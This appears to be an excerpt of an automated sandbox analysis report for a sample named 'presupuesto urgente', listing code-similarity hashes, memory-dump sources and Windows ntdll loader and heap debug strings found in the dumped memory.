                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1975516107
                                                                                                                                                      • Opcode ID: 4a36d375420aa1f8369595d69640cbf4b5eb183e298294bc731c5480a3056196
                                                                                                                                                      • Instruction ID: c82041ffd25cbac1dbbbede59619fcb3b321b283f3de5212ac7df66d26211267
                                                                                                                                                      • Opcode Fuzzy Hash: 4a36d375420aa1f8369595d69640cbf4b5eb183e298294bc731c5480a3056196
                                                                                                                                                      • Instruction Fuzzy Hash: 8C513176E04345AFFB04DFA4E48479DBBF1BF84314F65455AE802AB691D770A982CB80
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                      • API String ID: 0-2224505338
                                                                                                                                                      • Opcode ID: 4665e12e17a6f339669287e6216bca550267d372759e43712290477c4d1f994b
                                                                                                                                                      • Instruction ID: c3def58815e95eaf3373f9085f9455c4de47a1a788853937991ab0913ccb367c
                                                                                                                                                      • Opcode Fuzzy Hash: 4665e12e17a6f339669287e6216bca550267d372759e43712290477c4d1f994b
                                                                                                                                                      • Instruction Fuzzy Hash: C5514636912345EFD701CF68F8A4E5A7BB4EF046A0F548999F401EBA92CA71D940CF50
                                                                                                                                                      Strings
                                                                                                                                                      • HandleTraces, xrefs: 335B890F
                                                                                                                                                      • AVRF: -*- final list of providers -*- , xrefs: 335B880F
                                                                                                                                                      • VerifierDebug, xrefs: 335B8925
                                                                                                                                                      • VerifierFlags, xrefs: 335B88D0
                                                                                                                                                      • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 335B86BD
                                                                                                                                                      • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 335B86E7
                                                                                                                                                      • VerifierDlls, xrefs: 335B893D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                      • API String ID: 0-3223716464
                                                                                                                                                      • Opcode ID: 2bbef7fa053534dfac7b6c6ff31e51b0b2105ccb9d4c3a9f4565f76cd3ca906a
                                                                                                                                                      • Instruction ID: ddfe54dc5904c0ab40eb2998a907f186d353c38e76b7c91bca4711411d8588f5
                                                                                                                                                      • Opcode Fuzzy Hash: 2bbef7fa053534dfac7b6c6ff31e51b0b2105ccb9d4c3a9f4565f76cd3ca906a
                                                                                                                                                      • Instruction Fuzzy Hash: E5917B72D02391AFEF11DF24E890B2AB7F4EB80B55F861859F940EB291C7709C05CB96
                                                                                                                                                      Strings
                                                                                                                                                      • DGP3, xrefs: 33552382
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3359A7AF
                                                                                                                                                      • LdrpDynamicShimModule, xrefs: 3359A7A5
                                                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3359A79F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: DGP3$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-1177742792
                                                                                                                                                      • Opcode ID: 2bf3fba53305bed9392f3be2beb52c05f39cff3b14baf88c009cd987e18f50c2
                                                                                                                                                      • Instruction ID: 5f5cc51f177c0d2548ed421f01457af20866286ebabae59b7c10f187ddd2d9e1
                                                                                                                                                      • Opcode Fuzzy Hash: 2bf3fba53305bed9392f3be2beb52c05f39cff3b14baf88c009cd987e18f50c2
                                                                                                                                                      • Instruction Fuzzy Hash: F631E775A00200BFF710AF59E885A9977F5EBD0B50F260459E801FB655DBB45942CB60
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-523794902
                                                                                                                                                      • Opcode ID: 5cfd07a918b75144a1e8d7fa603829a066ef42dffbbadc3934a828843249771f
                                                                                                                                                      • Instruction ID: 18c70ee1df785164c51e102b2e56b6a22d024f00a7e1f82ec48c61459f77cb94
                                                                                                                                                      • Opcode Fuzzy Hash: 5cfd07a918b75144a1e8d7fa603829a066ef42dffbbadc3934a828843249771f
                                                                                                                                                      • Instruction Fuzzy Hash: ED42E0766087819FD305CF28E880B2ABBF5FF88744F884A6DE485CB691DB34D941CB52
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.U3
                                                                                                                                                      • API String ID: 0-4262189537
                                                                                                                                                      • Opcode ID: cd6a3e6ed06f1657cb7bb4f3abdae4a75d44a46d64d473c807fce819b3c881f7
                                                                                                                                                      • Instruction ID: 37296b9b02136e76c5d9e2f1d7a120396288bfbd841f772e34150b88fa6aaf53
                                                                                                                                                      • Opcode Fuzzy Hash: cd6a3e6ed06f1657cb7bb4f3abdae4a75d44a46d64d473c807fce819b3c881f7
                                                                                                                                                      • Instruction Fuzzy Hash: 5FF15EB6D01218EFEB05CF95E940EDEBBBCFF48650F55446AE502A7610EB74AE01CB90
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                      • API String ID: 0-122214566
                                                                                                                                                      • Opcode ID: 4e8b303b04b78dad1875a7f8652b28e29fab17627590349bb30e05af48557f8a
                                                                                                                                                      • Instruction ID: 05f0a6bb2e6a9c5ff8d4f030da8bb48c924834f727e7378b689ac784dad8a720
                                                                                                                                                      • Opcode Fuzzy Hash: 4e8b303b04b78dad1875a7f8652b28e29fab17627590349bb30e05af48557f8a
                                                                                                                                                      • Instruction Fuzzy Hash: 9CC15875E04355ABEF0C8B64E890BBE77B5EF85340F994469E882EB290EB74D944C390
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-792281065
                                                                                                                                                      • Opcode ID: 760a68a5562fb703fcda71c46dd230dd668cf6d20e10bf41950529ec78c8e6ce
                                                                                                                                                      • Instruction ID: 6015f7b0942025a5f98ac567995fb79c7ac669990a9f647a3b71643bb01d944b
                                                                                                                                                      • Opcode Fuzzy Hash: 760a68a5562fb703fcda71c46dd230dd668cf6d20e10bf41950529ec78c8e6ce
                                                                                                                                                      • Instruction Fuzzy Hash: 159157B0E02354AFEB25DF58F844B5D7BB4FB90B58F550529E900AF681DBB09842EB90
                                                                                                                                                      Strings
                                                                                                                                                      • Loading import redirection DLL: '%wZ', xrefs: 335A7F7B
                                                                                                                                                      • Unable to build import redirection Table, Status = 0x%x, xrefs: 335A7FF0
                                                                                                                                                      • LdrpInitializeProcess, xrefs: 3356C5E4
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 3356C5E3
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 335A7F8C, 335A8000
                                                                                                                                                      • LdrpInitializeImportRedirection, xrefs: 335A7F82, 335A7FF6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 0-475462383
                                                                                                                                                      • Opcode ID: d038b6e7dca1e9544d3943c6336c8999f1d695fed39deba0b4cef8e95b4fde61
                                                                                                                                                      • Instruction ID: cc4100c2ad3d9b8dff734b8fae4f65bac426a95436baf66b606e7ffdc59825c1
                                                                                                                                                      • Opcode Fuzzy Hash: d038b6e7dca1e9544d3943c6336c8999f1d695fed39deba0b4cef8e95b4fde61
                                                                                                                                                      • Instruction Fuzzy Hash: 3F3122B1A05301AFD314EF28F855E1ABBE4EFD4A50F410858F895AB391E620EC04CBA2
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                      • API String ID: 0-4253913091
                                                                                                                                                      • Opcode ID: 1a12a3a49977a9bce89a84325ce28cff05de5c3e7101e44835a82626b263c02e
                                                                                                                                                      • Instruction ID: 339a36201152c44278316d0a60ec70fb3f8dfb51dba6e372b0031377dbb94ebb
                                                                                                                                                      • Opcode Fuzzy Hash: 1a12a3a49977a9bce89a84325ce28cff05de5c3e7101e44835a82626b263c02e
                                                                                                                                                      • Instruction Fuzzy Hash: A7F1BF75A00706DFEB08CF68E984BAAB7F5FF84340F2445A8E4459B781D734E981CB91
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                                      • API String ID: 3446177414-2283098728
                                                                                                                                                      • Opcode ID: 579f31fd4779e2e658283b97a394df3c800df205a4e725379e4f4a00760059cc
                                                                                                                                                      • Instruction ID: 80a196f94fcf7b3c6945e86a868b0fab56a4354578a65fa43f75d70daa504e84
                                                                                                                                                      • Opcode Fuzzy Hash: 579f31fd4779e2e658283b97a394df3c800df205a4e725379e4f4a00760059cc
                                                                                                                                                      • Instruction Fuzzy Hash: 9051F271A017019FF714DF28E884B1977F5BBC5620F580A6EF45297A91EB78B811CB82
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 335A80F3
                                                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 335A80E2
                                                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 335A80E9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 3446177414-1783798831
                                                                                                                                                      • Opcode ID: ae6fb28bdea9eeccd131554edc57e5c6a3063fb88886b6e4cd0287855c266cca
                                                                                                                                                      • Instruction ID: 2b406fd305b31881f92b4374c24918369d101c52ebc1b9ea9774abda934e8436
                                                                                                                                                      • Opcode Fuzzy Hash: ae6fb28bdea9eeccd131554edc57e5c6a3063fb88886b6e4cd0287855c266cca
                                                                                                                                                      • Instruction Fuzzy Hash: 9841F0B5911300AFDB11EB68EC40B4B7BF8FF84A54F41182AB858E7290EB70D8118B96
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpCheckRedirection, xrefs: 335B450F
                                                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 335B4508
                                                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 335B4519
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                      • API String ID: 3446177414-3154609507
                                                                                                                                                      • Opcode ID: 84f2c6aa359921defe339c119c2c88d10dc25ac9f272fa689a01e30b184a2bb1
                                                                                                                                                      • Instruction ID: 4da570c451bd42d4415e3f7566700edcf8e1d346c104daea7d04fa088ed075db
                                                                                                                                                      • Opcode Fuzzy Hash: 84f2c6aa359921defe339c119c2c88d10dc25ac9f272fa689a01e30b184a2bb1
                                                                                                                                                      • Instruction Fuzzy Hash: E841E6B66057119FDF20CF58E540A1677F4FF88792F0A0A59EC98D7256D731D8A0CB81
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                      • API String ID: 0-3061284088
                                                                                                                                                      • Opcode ID: 8560520edfcc43ed03dfcc7839ac028dce12160b7d561f60d4f5ceaa0ccb606f
                                                                                                                                                      • Instruction ID: d71ac50dd3319593a525a8c5580c03c4da2651a81cdce60320f7c67ac48d549d
                                                                                                                                                      • Opcode Fuzzy Hash: 8560520edfcc43ed03dfcc7839ac028dce12160b7d561f60d4f5ceaa0ccb606f
                                                                                                                                                      • Instruction Fuzzy Hash: 90014C36516640EFE3059729F41CF427BB4DF81774F594889F050DB9D28A96D840DD50
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                      • API String ID: 0-379654539
                                                                                                                                                      • Opcode ID: f72ec31eb755e0b687986efd8735b62c6f1a57bd2ceb1ddaf4a1011de78048b5
                                                                                                                                                      • Instruction ID: c9f780b670d3aee48c67eaf3fac8b0db076d329fc4e6fd0018bea1c9d9a73d2e
                                                                                                                                                      • Opcode Fuzzy Hash: f72ec31eb755e0b687986efd8735b62c6f1a57bd2ceb1ddaf4a1011de78048b5
                                                                                                                                                      • Instruction Fuzzy Hash: D1C1A975109386CFE711CF68E040B9AB7F4BF86764F44896AF885CB290E734C94ACB52
                                                                                                                                                      Strings
                                                                                                                                                      • LdrpInitializeProcess, xrefs: 33568342
                                                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 33568341
                                                                                                                                                      • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3356847E
                                                                                                                                                      • @, xrefs: 335684B1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                      • API String ID: 0-1918872054
                                                                                                                                                      • Opcode ID: 5f41cf8b749b0f9e1d22d3a84231dcb4cbc8e9c85bceaa55ead365be6cf37260
                                                                                                                                                      • Instruction ID: b0636f3fac8d89c3280bfa6ad54f7b30511265952fe46b35b6faeaae1b88a4b8
                                                                                                                                                      • Opcode Fuzzy Hash: 5f41cf8b749b0f9e1d22d3a84231dcb4cbc8e9c85bceaa55ead365be6cf37260
                                                                                                                                                      • Instruction Fuzzy Hash: DF917C71508340AFE321DE60E840EABB7ECEF8478AF84192DFA88D2550E774D944CB62
                                                                                                                                                      Strings
                                                                                                                                                      • SXS: %s() passed the empty activation context, xrefs: 335A1FE8
                                                                                                                                                      • .Local, xrefs: 335627F8
                                                                                                                                                      • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 335A20C0
                                                                                                                                                      • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 335A1FE3, 335A20BB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                      • API String ID: 0-1239276146
                                                                                                                                                      • Opcode ID: 6f885ad78a0d837e406a0d894d6b13d69f82ad837a5a440c1bfae25df036bb32
                                                                                                                                                      • Instruction ID: 64a524c35a09044131d6e7138729843687e41d25dbc396ad49f9150c916e38b7
                                                                                                                                                      • Opcode Fuzzy Hash: 6f885ad78a0d837e406a0d894d6b13d69f82ad837a5a440c1bfae25df036bb32
                                                                                                                                                      • Instruction Fuzzy Hash: 01A1DE35D0032A9BDB24CF64EC84B99B3B5BF58358F5415E9E808A7251DB349EC1CF90
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}Q3
                                                                                                                                                      • API String ID: 0-3024287029
                                                                                                                                                      • Opcode ID: 2bd7c7fa05a99d6bb90991fc58aa7ba8747aa101960a090e53e831d435bcbeea
                                                                                                                                                      • Instruction ID: 4bc6a9b7c612c528c4554ecc224347b79064ccb13773ba1b2f842ca2abfed7b5
                                                                                                                                                      • Opcode Fuzzy Hash: 2bd7c7fa05a99d6bb90991fc58aa7ba8747aa101960a090e53e831d435bcbeea
                                                                                                                                                      • Instruction Fuzzy Hash: D3819175608384AFE711CB94E884B5AB7E8FF94B54F48492DF980DB290DB78D904CB52
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.000000003362D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_2_2_33500000_presupuesto urgente.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: LUP3$LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                      • API String ID: 0-1022177299
                                                                                                                                                      • Opcode ID: 743d795b46d3df7064ccb9ae8f7da29ddaaea9df51fe5437a21b02f528170c8d
                                                                                                                                                      • Instruction ID: ca806f139f50bbb40d45326e594c5f40bdc8a780009e06770e4a046edd7bb830
                                                                                                                                                      • Opcode Fuzzy Hash: 743d795b46d3df7064ccb9ae8f7da29ddaaea9df51fe5437a21b02f528170c8d
                                                                                                                                                      • Instruction Fuzzy Hash: 7891FD75E06359CFEB12CF54E4407EEB7B0FF06364F588599E840AB290E7789A80CB90
                                                                                                                                                      Strings
                                                                                                                                                      • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 33590E2F
                                                                                                                                                      • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 33590E72
                                                                                                                                                      • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 33590EB5
                                                                                                                                                      • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 33590DEC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.8372612212.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Offset: 33500000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.8372612212.0000000033629000.00000040.00001000.00020000.00000000.sdmpDownload File
